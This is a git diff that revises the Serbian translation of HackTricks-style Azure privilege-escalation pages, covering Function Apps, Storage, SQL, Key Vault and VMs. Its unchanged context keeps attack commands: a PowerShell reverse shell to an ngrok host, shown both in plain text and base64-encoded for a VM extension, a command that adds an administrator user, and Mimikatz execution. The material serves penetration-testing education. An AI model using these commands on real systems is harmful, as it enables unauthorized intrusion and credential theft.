 - [https://www.youtube.com/watch?v=yOJ6yB9anZM\&t=296s](https://www.youtube.com/watch?v=yOJ6yB9anZM&t=296s)
 - [https://www.youtube.com/watch?v=xei8lAPitX8](https://www.youtube.com/watch?v=xei8lAPitX8)
diff --git a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/dynamic-groups.md b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/dynamic-groups.md
index d860d2362..3c3d6fdd1 100644
--- a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/dynamic-groups.md
+++ b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/dynamic-groups.md
@@ -2,9 +2,9 @@
 
 {{#include ../../../../banners/hacktricks-training.md}}
 
-## Osnovne informacije
+## Osnovne Informacije
 
-**Dinamičke grupe** su grupe koje imaju set **pravila** konfigurisanih i svi **korisnici ili uređaji** koji se poklapaju sa pravilima se dodaju u grupu. Svaki put kada se **atribut** korisnika ili uređaja **promeni**, dinamička pravila se **ponovo proveravaju**. A kada se **novo pravilo** **kreira**, svi uređaji i korisnici se **proveravaju**.
+**Dynamic groups** su grupe koje imaju set **pravila** konfigurisanih i svi **korisnici ili uređaji** koji se poklapaju sa pravilima se dodaju u grupu. Svaki put kada se **atribut** korisnika ili uređaja **promeni**, dinamička pravila se **ponovo proveravaju**. A kada se **novo pravilo** **kreira**, svi uređaji i korisnici se **proveravaju**.
 
 Dinamičkim grupama se mogu dodeliti **Azure RBAC uloge**, ali nije **moguće** dodati **AzureAD uloge** dinamičkim grupama.
 
@@ -21,7 +21,7 @@ Dobijte grupe koje omogućavaju dinamičko članstvo: **`az ad group list --quer
 - **Primer pravila**: `(user.otherMails -any (_ -contains "security")) -and (user.userType -eq "guest")`
 - **Opis pravila**: Bilo koji gost korisnik sa sekundarnim emailom koji sadrži string 'security' biće dodat u grupu
 
-Za email gost korisnika, prihvatite pozivnicu i proverite trenutne postavke **tog korisnika** na [https://entra.microsoft.com/#view/Microsoft_AAD_IAM/TenantOverview.ReactView](https://entra.microsoft.com/#view/Microsoft_AAD_IAM/TenantOverview.ReactView).\
+Za email gost korisnika, prihvatite pozivnicu i proverite trenutne postavke **tog korisnika** u [https://entra.microsoft.com/#view/Microsoft_AAD_IAM/TenantOverview.ReactView](https://entra.microsoft.com/#view/Microsoft_AAD_IAM/TenantOverview.ReactView).\
 Nažalost, stranica ne dozvoljava modifikaciju vrednosti atributa, tako da moramo koristiti API:
 ```powershell
 # Login with the gust user
@@ -41,7 +41,7 @@ az rest --method GET \
 --url "https://graph.microsoft.com/v1.0/users/" \
 --query "otherMails"
 ```
-## References
+## Reference
 
 - [https://www.mnemonic.io/resources/blog/abusing-dynamic-groups-in-azure-ad-for-privilege-escalation/](https://www.mnemonic.io/resources/blog/abusing-dynamic-groups-in-azure-ad-for-privilege-escalation/)
 
diff --git a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.md b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.md
index b682fc527..38afcf367 100644
--- a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.md
+++ b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.md
@@ -4,7 +4,7 @@
 
 ## Function Apps
 
-Check the following page for more information:
+Proverite sledeću stranicu za više informacija:
 
 {{#ref}}
 ../az-services/az-function-apps.md
@@ -26,7 +26,7 @@ az functionapp config appsettings list \
 --name  \
 --resource-group 
 ```
-Ti konfiguracije će sadržati **Storage Account Key** koji Funkcija može koristiti za pristup kodu.
+Te konfiguracije će sadržati **Storage Account Key** koji Funkcija može koristiti za pristup kodu.
 
 > [!CAUTION]
 > Sa dovoljno dozvola za povezivanje na File Share i **modifikovanje skripte** koja se izvršava, moguće je izvršiti proizvoljan kod u Funkciji i eskalirati privilegije.
@@ -47,7 +47,7 @@ open "smb://.file.core.windows.net/"
 ```
 - **`function-releases`** (`WEBSITE_RUN_FROM_PACKAGE`)
 
-Takođe je uobičajeno pronaći **zip izdanja** unutar fascikle `function-releases` kontejnera Storage Account-a koji funkcijska aplikacija koristi u kontejneru **obično nazvanom `function-releases`**.
+Takođe je uobičajeno pronaći **zip izdanja** unutar foldera `function-releases` u kontejneru Storage Account-a koji funkcijska aplikacija koristi u kontejneru **obično nazvanom `function-releases`**.
 
 Obično će ova metoda implementacije postaviti `WEBSITE_RUN_FROM_PACKAGE` konfiguraciju u:
 ```bash
@@ -64,7 +64,7 @@ Ova konfiguracija obično sadrži **SAS URL za preuzimanje** koda iz Storage Acc
 
 Baš kao u prethodnom slučaju, ako je implementacija izvršena putem Github Actions, moguće je pronaći folder **`github-actions-deploy`** u Storage Account-u koji sadrži zip koda i SAS URL do zip-a u podešavanju `WEBSITE_RUN_FROM_PACKAGE`.
 
-- **`scm-releases`**`(WEBSITE_CONTENTAZUREFILECONNECTIONSTRING` i `WEBSITE_CONTENTSHARE`) 
+- **`scm-releases`**`(WEBSITE_CONTENTAZUREFILECONNECTIONSTRING` i `WEBSITE_CONTENTSHARE`)
 
 Sa dozvolama za čitanje kontejnera unutar Storage Account-a koji čuva podatke funkcije, moguće je pronaći kontejner **`scm-releases`**. Tamo je moguće pronaći najnovije izdanje u **Squashfs filesystem file format** i stoga je moguće pročitati kod funkcije:
 ```bash
@@ -98,10 +98,10 @@ unsquashfs -l "/tmp/scm-latest-.zip"
 mkdir /tmp/fs
 unsquashfs -d /tmp/fs /tmp/scm-latest-.zip
 ```
-Takođe je moguće pronaći **master i functions ključeve** pohranjene u skladišnom računu u kontejneru **`azure-webjobs-secrets`** unutar fascikle **``** u JSON datotekama koje možete pronaći unutra.
+Takođe je moguće pronaći **master i functions ključeve** pohranjene u skladišnom nalogu u kontejneru **`azure-webjobs-secrets`** unutar fascikle **``** u JSON datotekama koje možete pronaći unutra.
 
 > [!CAUTION]
-> Sa dovoljno dozvola za povezivanje sa blob kontejnerom koji **sadrži kod u zip ekstenzijskoj datoteci** (koja zapravo jeste **`squashfs`**) moguće je izvršiti proizvoljan kod u Funkciji i eskalirati privilegije.
+> Sa dovoljno dozvola za povezivanje na blob kontejner koji **sadrži kod u zip ekstenziji** (koji zapravo jeste **`squashfs`**) moguće je izvršiti proizvoljan kod u Funkciji i eskalirati privilegije.
 ```bash
 # Modify code inside the script in /tmp/fs adding your code
 
@@ -118,7 +118,7 @@ az storage blob upload \
 ```
 ### Microsoft.Web/sites/host/listkeys/action
 
-Ova dozvola omogućava da se prikažu funkcijski, master i sistemski ključevi, ali ne i host ključ, određene funkcije sa:
+Ova dozvola omogućava da se prikažu funkcijski, master i sistemski ključevi, ali ne i host ključ, specificirane funkcije sa:
 ```bash
 az functionapp keys list --resource-group  --name 
 ```
@@ -151,13 +151,13 @@ az rest --method POST --uri "https://management.azure.com/subscriptions/ --key-name  --key-type functionKeys --name  --key-value q_8ILAoJaSp_wxpyHzGm4RVMPDKnjM_vpEb7z123yRvjAzFuo6wkIQ==
 ```
 ### Microsoft.Web/sites/host/masterKey/write
 
-Ova dozvola omogućava kreiranje/izmenu glavnog ključa za određenu funkciju sa:
+Ova dozvola omogućava kreiranje/aktuelizaciju glavnog ključa za određenu funkciju sa:
 ```bash
 az functionapp keys set --resource-group  --key-name  --key-type masterKey --name  --key-value q_8ILAoJaSp_wxpyHzGm4RVMPDKnjM_vpEb7z123yRvjAzFuo6wkIQ==
 ```
@@ -183,9 +183,9 @@ az rest --method POST \
 ```
 ### Microsoft.Web/sites/config/list/action, Microsoft.Web/sites/config/write
 
-Ove dozvole omogućavaju da se prikažu konfiguracione vrednosti funkcije kao što smo ranije videli, plus **da se modifikuju te vrednosti**. Ovo je korisno jer ove postavke ukazuju na to gde se nalazi kod koji treba da se izvrši unutar funkcije. 
+Ove dozvole omogućavaju da se prikažu konfiguracione vrednosti funkcije kao što smo ranije videli, plus **da se modifikuju te vrednosti**. Ovo je korisno jer ovi parametri ukazuju na to gde se nalazi kod koji treba izvršiti unutar funkcije. 
 
-Stoga je moguće postaviti vrednost postavke **`WEBSITE_RUN_FROM_PACKAGE`** koja pokazuje na URL zip datoteku koja sadrži novi kod koji treba da se izvrši unutar web aplikacije:
+Stoga je moguće postaviti vrednost parametra **`WEBSITE_RUN_FROM_PACKAGE`** koja pokazuje na URL zip datoteku koja sadrži novi kod koji treba izvršiti unutar web aplikacije:
 
 - Počnite tako što ćete dobiti trenutnu konfiguraciju
 ```bash
@@ -234,7 +234,7 @@ az functionapp deployment list-publishing-profiles \
 --resource-group  \
 --output json
 ```
-Još jedna opcija bi bila da postavite svoje kredencijale i koristite ih pomoću:
+Druga opcija bi bila da postavite svoje kredencijale i koristite ih pomoću:
 ```bash
 az functionapp deployment user set \
 --user-name DeployUser123456 g \
@@ -262,9 +262,9 @@ az rest --method PUT \
 }
 }
 ```
-- **Metod SCM**
+- **Metoda SCM**
 
-Zatim, možete pristupiti sa ovim **osnovnim autentifikacionim podacima do SCM URL-a** vaše funkcijske aplikacije i dobiti vrednosti env varijabli:
+Zatim, možete pristupiti sa ovim **osnovnim autentifikacionim podacima za SCM URL** vaše funkcijske aplikacije i dobiti vrednosti env varijabli:
 ```bash
 # Get settings values
 curl -u ':' \
@@ -277,11 +277,11 @@ https://.scm.azurewebsites.net/api/zipdeploy
 ```
 _Napomena da je **SCM korisničko ime** obično znak "$" praćen imenom aplikacije, tako da: `$`._
 
-Možete takođe pristupiti veb stranici sa `https://.scm.azurewebsites.net/BasicAuth`
+Takođe možete pristupiti veb stranici sa `https://.scm.azurewebsites.net/BasicAuth`
 
 Vrednosti podešavanja sadrže **AccountKey** skladišnog naloga koji čuva podatke funkcijske aplikacije, omogućavajući kontrolu nad tim skladišnim nalogom.
 
-- **Metod FTP**
+- **Metoda FTP**
 
 Povežite se na FTP server koristeći:
 ```bash
@@ -310,7 +310,7 @@ az rest --method POST \
 ```
 ### Microsoft.Web/sites/hostruntime/vfs/read
 
-Ova dozvola omogućava **čitati izvorni kod** aplikacije putem VFS-a:
+Ova dozvola omogućava **čitati izvorni kod** aplikacije putem VFS:
 ```bash
 az rest --url "https://management.azure.com/subscriptions//resourceGroups//providers/Microsoft.Web/sites//hostruntime/admin/vfs/function_app.py?relativePath=1&api-version=2022-03-01"
 ```
@@ -352,14 +352,14 @@ az functionapp config container set --name  \
 ```
 ### Microsoft.Web/sites/write, Microsoft.ManagedIdentity/userAssignedIdentities/assign/action, Microsoft.App/managedEnvironments/join/action, (Microsoft.Web/sites/read, Microsoft.Web/sites/operationresults/read)
 
-Sa ovim dozvolama je moguće **priključiti novu identitet korisnika koji se upravlja funkciji**. Ako je funkcija kompromitovana, to bi omogućilo eskalaciju privilegija na bilo koji identitet korisnika koji se upravlja.
+Sa ovim dozvolama moguće je **priključiti novu korisničku upravljanu identitet** funkciji. Ako je funkcija kompromitovana, to bi omogućilo eskalaciju privilegija na bilo koji korisnički upravljani identitet.
 ```bash
 az functionapp identity assign \
 --name  \
 --resource-group  \
 --identities /subscriptions//providers/Microsoft.ManagedIdentity/userAssignedIdentities/
 ```
-### Remote Debugging
+### Daljinsko debagovanje
 
 Takođe je moguće povezati se za debagovanje pokrenute Azure funkcije kao [**objašnjeno u dokumentaciji**](https://learn.microsoft.com/en-us/azure/azure-functions/functions-develop-vs). Međutim, podrazumevano će Azure isključiti ovu opciju za 2 dana u slučaju da programer zaboravi kako bi se izbeglo ostavljanje ranjivih konfiguracija.
 
@@ -367,7 +367,7 @@ Moguće je proveriti da li funkcija ima omogućeno debagovanje sa:
 ```bash
 az functionapp show --name  --resource-group 
 ```
-Imajući dozvolu `Microsoft.Web/sites/config/write`, takođe je moguće staviti funkciju u režim otklanjanja grešaka (sledeća komanda takođe zahteva dozvole `Microsoft.Web/sites/config/list/action`, `Microsoft.Web/sites/config/Read` i `Microsoft.Web/sites/Read`).
+Imajući dozvolu `Microsoft.Web/sites/config/write`, takođe je moguće staviti funkciju u režim debagovanja (sledeća komanda takođe zahteva dozvole `Microsoft.Web/sites/config/list/action`, `Microsoft.Web/sites/config/Read` i `Microsoft.Web/sites/Read`).
 ```bash
 az functionapp config set --remote-debugging-enabled=True --name  --resource-group 
 ```
diff --git a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-key-vault-privesc.md b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-key-vault-privesc.md
index 1c96e53f5..5e7ab9312 100644
--- a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-key-vault-privesc.md
+++ b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-key-vault-privesc.md
@@ -4,7 +4,7 @@
 
 ## Azure Key Vault
 
-Za više informacija o ovoj usluzi proverite:
+Za više informacija o ovoj usluzi pogledajte:
 
 {{#ref}}
 ../az-services/keyvault.md
@@ -12,7 +12,7 @@ Za više informacija o ovoj usluzi proverite:
 
 ### Microsoft.KeyVault/vaults/write
 
-Napadač sa ovom dozvolom će moći da izmeni politiku ključnog trezora (ključni trezor mora koristiti pristupne politike umesto RBAC).
+Napadač sa ovom dozvolom će moći da izmeni politiku ključnog trezora (ključni trezor mora koristiti pristupne politike umesto RBAC-a).
 ```bash
 # If access policies in the output, then you can abuse it
 az keyvault show --name 
diff --git a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-queue-privesc.md b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-queue-privesc.md
index 87b55d680..ef9dad79a 100644
--- a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-queue-privesc.md
+++ b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-queue-privesc.md
@@ -20,7 +20,7 @@ az storage message peek --queue-name  --account-name  --account-name 
 ```
@@ -32,7 +32,7 @@ az storage message put --queue-name  --content "Injected malicious m
 ```
 ### DataActions: `Microsoft.Storage/storageAccounts/queueServices/queues/messages/write`
 
-Ova dozvola omogućava napadaču da doda nove poruke ili ažurira postojeće u Azure Storage Queue. Korišćenjem ove dozvole, mogli bi da ubace štetan sadržaj ili promene postojeće poruke, potencijalno obmanjujući aplikacije ili uzrokujući neželjeno ponašanje u sistemima koji se oslanjaju na red.
+Ova dozvola omogućava napadaču da doda nove poruke ili ažurira postojeće u Azure Storage Queue. Korišćenjem ovoga, mogli bi umetnuti štetan sadržaj ili izmeniti postojeće poruke, potencijalno obmanjujući aplikacije ili uzrokujući neželjeno ponašanje u sistemima koji se oslanjaju na red.
 ```bash
 az storage message put --queue-name  --content "Injected malicious message" --account-name 
 
@@ -54,7 +54,7 @@ az storage queue metadata update --name  --metadata key1=value1 key2
 
 az storage queue policy set --name  --permissions rwd --expiry 2024-12-31T23:59:59Z --account-name 
 ```
-## References
+## Reference
 
 - https://learn.microsoft.com/en-us/azure/storage/queues/storage-powershell-how-to-use-queues
 - https://learn.microsoft.com/en-us/rest/api/storageservices/queue-service-rest-api
diff --git a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-servicebus-privesc.md b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-servicebus-privesc.md
index 1aaa2e72e..b3f8af707 100644
--- a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-servicebus-privesc.md
+++ b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-servicebus-privesc.md
@@ -83,7 +83,7 @@ print("----------------------------")
 ```
 ### Prijem poruka. Akcija: `Microsoft.ServiceBus/namespaces/authorizationRules/listkeys/action` ILI `Microsoft.ServiceBus/namespaces/authorizationRules/regenerateKeys/action`
 
-Možete preuzeti PrimaryConnectionString, koji služi kao akreditiv za Service Bus namespace. Koristeći ovaj konekcioni string, možete primati poruke iz bilo koje queue ili subscription unutar namespace-a, omogućavajući pristup potencijalno osetljivim ili kritičnim podacima, omogućavajući exfiltraciju podataka ili ometajući obradu poruka i radne tokove aplikacija.
+Možete preuzeti PrimaryConnectionString, koji služi kao akreditiv za Service Bus namespace. Koristeći ovaj konekcioni string, možete primati poruke iz bilo koje queue ili subscription unutar namespace-a, omogućavajući pristup potencijalno osetljivim ili kritičnim podacima, omogućavajući eksfiltraciju podataka ili ometanje obrade poruka i radnih tokova aplikacija.
 ```python
 #You need to install the following libraries
 #pip install azure-servicebus
diff --git a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-sql-privesc.md b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-sql-privesc.md
index 18bee434f..f6a144dba 100644
--- a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-sql-privesc.md
+++ b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-sql-privesc.md
@@ -12,7 +12,7 @@ Za više informacija o SQL bazi podataka pogledajte:
 
 ### "Microsoft.Sql/servers/read" && "Microsoft.Sql/servers/write"
 
-Sa ovim dozvolama, korisnik može izvršiti eskalaciju privilegija ažuriranjem ili kreiranjem Azure SQL servera i modifikovanjem kritičnih konfiguracija, uključujući administratorske akreditive. Ova dozvola omogućava korisniku da ažurira svojstva servera, uključujući SQL server admin lozinku, omogućavajući neovlašćen pristup ili kontrolu nad serverom. Takođe mogu kreirati nove servere, potencijalno uvodeći senčanu infrastrukturu u zle svrhe. Ovo postaje posebno kritično u okruženjima gde je "Microsoft Entra Authentication Only" onemogućen, jer mogu iskoristiti SQL-baziranu autentifikaciju za sticanje neograničenog pristupa.
+Sa ovim dozvolama, korisnik može izvršiti eskalaciju privilegija ažuriranjem ili kreiranjem Azure SQL servera i modifikovanjem kritičnih konfiguracija, uključujući administratorske akreditive. Ova dozvola omogućava korisniku da ažurira svojstva servera, uključujući SQL server admin lozinku, omogućavajući neovlašćen pristup ili kontrolu nad serverom. Takođe mogu kreirati nove servere, potencijalno uvodeći senčanu infrastrukturu u zle svrhe. Ovo postaje posebno kritično u okruženjima gde je "Microsoft Entra Authentication Only" onemogućen, jer mogu iskoristiti SQL-baziranu autentifikaciju da dobiju neograničen pristup.
 ```bash
 # Change the server password
 az sql server update \
@@ -37,7 +37,7 @@ az sql server update \
 ```
 ### "Microsoft.Sql/servers/firewallRules/write"
 
-Napadač može manipulisati pravilima vatrozida na Azure SQL serverima kako bi omogućio neovlašćen pristup. Ovo se može iskoristiti za otvaranje servera za specifične IP adrese ili čitave IP opsege, uključujući javne IP adrese, omogućavajući pristup zlonamernim akterima. Ova post-eksploataciona aktivnost može se koristiti za zaobilaženje postojećih mrežnih bezbednosnih kontrola, uspostavljanje postojanosti ili olakšavanje lateralnog kretanja unutar okruženja izlaganjem osetljivih resursa.
+Napadač može manipulisati pravilima vatrozida na Azure SQL serverima kako bi omogućio neovlašćen pristup. Ovo se može iskoristiti za otvaranje servera za specifične IP adrese ili čitave IP opsege, uključujući javne IP adrese, omogućavajući pristup zlonamernim akterima. Ova aktivnost nakon eksploatacije može se koristiti za zaobilaženje postojećih mrežnih bezbednosnih kontrola, uspostavljanje postojanosti ili olakšavanje lateralnog kretanja unutar okruženja izlaganjem osetljivih resursa.
 ```bash
 # Create Firewall Rule
 az sql server firewall-rule create \
@@ -56,7 +56,7 @@ az sql server firewall-rule update \
 --end-ip-address 
 ```
 Dodatno, `Microsoft.Sql/servers/outboundFirewallRules/delete` dozvola vam omogućava da obrišete pravilo vatrozida.  
-NAPOMENA: Potrebno je omogućiti javni pristup
+NAPOMENA: Potrebno je omogućiti javni pristup.
 
 ### ""Microsoft.Sql/servers/ipv6FirewallRules/write"
 
@@ -70,7 +70,7 @@ az sql server firewall-rule create \
 --end-ip-address 
 ```
 Dodatno, `Microsoft.Sql/servers/ipv6FirewallRules/delete` dozvola vam omogućava da obrišete pravilo vatrozida.  
-NAPOMENA: Potrebno je omogućiti javni pristup
+NAPOMENA: Potrebno je omogućiti javni pristup.
 
 ### "Microsoft.Sql/servers/administrators/write" && "Microsoft.Sql/servers/administrators/read"
 
@@ -84,7 +84,7 @@ az sql server ad-admin create \
 ```
 ### "Microsoft.Sql/servers/azureADOnlyAuthentications/write" && "Microsoft.Sql/servers/azureADOnlyAuthentications/read"
 
-Sa ovim dozvolama, možete konfigurisati i primeniti "Samo Microsoft Entra autentifikaciju" na Azure SQL Serveru, što može olakšati eskalaciju privilegija u određenim scenarijima. Napadač ili ovlašćeni korisnik sa ovim dozvolama može omogućiti ili onemogućiti autentifikaciju samo za Azure AD.
+Sa ovim dozvolama, možete konfigurisati i primeniti "Microsoft Entra Authentication Only" na Azure SQL Serveru, što može olakšati eskalaciju privilegija u određenim scenarijima. Napadač ili ovlašćeni korisnik sa ovim dozvolama može omogućiti ili onemogućiti Azure AD-only autentifikaciju.
 ```bash
 #Enable
 az sql server azure-ad-only-auth enable \
diff --git a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.md b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.md
index 660a8936b..59c04d5e6 100644
--- a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.md
+++ b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.md
@@ -4,7 +4,7 @@
 
 ## Storage Privesc
 
-Za više informacija o skladištu pogledajte:
+Za više informacija o skladištu, proverite:
 
 {{#ref}}
 ../az-services/az-storage.md
@@ -18,7 +18,7 @@ az storage account keys list --account-name 
 ```
 ### Microsoft.Storage/storageAccounts/regenerateKey/action
 
-Osoba sa ovom dozvolom će moći da obnovi i dobije novu tajnu vrednost **access keys** skladišnih naloga. Omogućavajući osobi da eskalira svoje privilegije nad skladišnim nalozima.
+Princip sa ovom dozvolom će moći da obnovi i dobije novu tajnu vrednost **access keys** skladišnih naloga. To omogućava principalu da eskalira svoje privilegije nad skladišnim nalozima.
 
 Pored toga, u odgovoru, korisnik će dobiti vrednost obnovljenog ključa, kao i vrednost neobnovljenog:
 ```bash
@@ -58,15 +58,15 @@ az storage container immutability-policy update \
 
 ### Microsoft.Storage/storageAccounts/fileServices/takeOwnership/action
 
-Ovo bi trebalo da omogući korisniku koji ima ovu dozvolu da preuzme vlasništvo nad datotekama unutar deljenog datotečnog sistema.
+Ovo bi trebalo da omogući korisniku koji ima ovu dozvolu da preuzme vlasništvo nad datotekama unutar deljenog fajl sistema.
 
 ### Microsoft.Storage/storageAccounts/fileServices/fileshares/files/modifypermissions/action
 
-Ovo bi trebalo da omogući korisniku koji ima ovu dozvolu da može da menja dozvole datoteka unutar deljenog datotečnog sistema.
+Ovo bi trebalo da omogući korisniku koji ima ovu dozvolu da menja dozvole datoteka unutar deljenog fajl sistema.
 
 ### Microsoft.Storage/storageAccounts/fileServices/fileshares/files/actassuperuser/action
 
-Ovo bi trebalo da omogući korisniku koji ima ovu dozvolu da može da izvršava radnje unutar datotečnog sistema kao superkorisnik.
+Ovo bi trebalo da omogući korisniku koji ima ovu dozvolu da izvršava radnje unutar fajl sistema kao superkorisnik.
 
 ### Microsoft.Storage/storageAccounts/localusers/write (Microsoft.Storage/storageAccounts/localusers/read)
 
@@ -96,7 +96,7 @@ sftp @.blob.core.windows.net
 ```
 ### Microsoft.Storage/storageAccounts/restoreBlobRanges/action, Microsoft.Storage/storageAccounts/blobServices/containers/read, Microsoft.Storage/storageAccounts/read && Microsoft.Storage/storageAccounts/listKeys/action
 
-Sa ovim dozvolama, napadač može da vrati obrisani kontejner tako što će navesti njegov ID obrisane verzije ili da ponovo aktivira određene blobove unutar kontejnera, ako su prethodno bili soft-deleted. Ova eskalacija privilegija može omogućiti napadaču da povrati osetljive podatke koji su trebali biti trajno obrisani, što može dovesti do neovlašćenog pristupa.
+Sa ovim dozvolama, napadač može da vrati obrisani kontejner tako što će navesti njegov ID obrisane verzije ili da ponovo aktivira specifične blobove unutar kontejnera, ako su prethodno bili soft-deleted. Ova eskalacija privilegija može omogućiti napadaču da povrati osetljive podatke koji su trebali biti trajno obrisani, što može dovesti do neovlašćenog pristupa.
 ```bash
 #Restore the soft deleted container
 az storage container restore \
diff --git a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.md b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.md
index 1e49b3982..b5e0aa9c2 100644
--- a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.md
+++ b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.md
@@ -4,7 +4,7 @@
 
 ## VMS & Network
 
-Za više informacija o Azure Virtuelnim Mašinama i Mreži pogledajte:
+Za više informacija o Azure Virtual Machines i Network proverite:
 
 {{#ref}}
 ../az-services/vms/
@@ -49,7 +49,7 @@ az vm extension set \
 
 {{#tab name="Windows" }}
 
-- Izvršite obrnuti shell
+- Izvrši reverznu ljusku
 ```bash
 # Get encoded reverse shell
 echo -n '$client = New-Object System.Net.Sockets.TCPClient("7.tcp.eu.ngrok.io",19159);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()' | iconv --to-code UTF-16LE | base64
@@ -65,7 +65,7 @@ az vm extension set \
 --protected-settings '{"commandToExecute": "powershell.exe -EncodedCommand JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIANwAuAHQAYwBwAC4AZQB1AC4AbgBnAHIAbwBrAC4AaQBvACIALAAxADkAMQA1ADkAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA="}'
 
 ```
-- Izvrši reverznu ljusku iz datoteke
+- Izvrši reverznu ljusku iz fajla
 ```bash
 az vm extension set \
 --resource-group  \
@@ -78,7 +78,7 @@ az vm extension set \
 ```
 Možete takođe izvršiti druge payload-ove kao što su: `powershell net users new_user Welcome2022. /add /Y; net localgroup administrators new_user /add`
 
-- Resetovanje lozinke koristeći VMAccess ekstenziju
+- Resetujte lozinku koristeći VMAccess ekstenziju
 ```powershell
 # Run VMAccess extension to reset the password
 $cred=Get-Credential # Username and password to reset (if it doesn't exist it'll be created). "Administrator" username is allowed to change the password
@@ -155,7 +155,7 @@ Set-AzVMDscExtension `
 
 

 
-Hybrid Runbook Worker
+Hibridni Runbook Radnik
 
 Ovo je VM ekstenzija koja bi omogućila izvršavanje runbook-ova u VM-ovima iz automatskog naloga. Za više informacija pogledajte [Automation Accounts service](../az-services/az-automation-account/).
 
@@ -163,7 +163,7 @@ Ovo je VM ekstenzija koja bi omogućila izvršavanje runbook-ova u VM-ovima iz a
 
 ### `Microsoft.Compute/disks/write, Microsoft.Network/networkInterfaces/join/action, Microsoft.Compute/virtualMachines/write, (Microsoft.Compute/galleries/applications/write, Microsoft.Compute/galleries/applications/versions/write)`
 
-Ovo su potrebne dozvole za **kreiranje nove galerijske aplikacije i izvršavanje unutar VM-a**. Galerijske aplikacije mogu izvršavati bilo šta, tako da bi napadač mogao zloupotrebiti ovo da kompromituje VM instance izvršavajući proizvoljne komande.
+Ovo su potrebne dozvole za **kreiranje nove galerijske aplikacije i njeno izvršavanje unutar VM-a**. Galerijske aplikacije mogu izvršavati bilo šta, tako da bi napadač mogao iskoristiti ovo da kompromituje VM instance izvršavajući proizvoljne komande.
 
 Poslednje 2 dozvole mogu se izbeći deljenjem aplikacije sa zakupcem.
 
@@ -300,17 +300,17 @@ Invoke-AzureRmVMBulkCMD -Script Mimikatz.ps1 -Verbose -output Output.txt
 
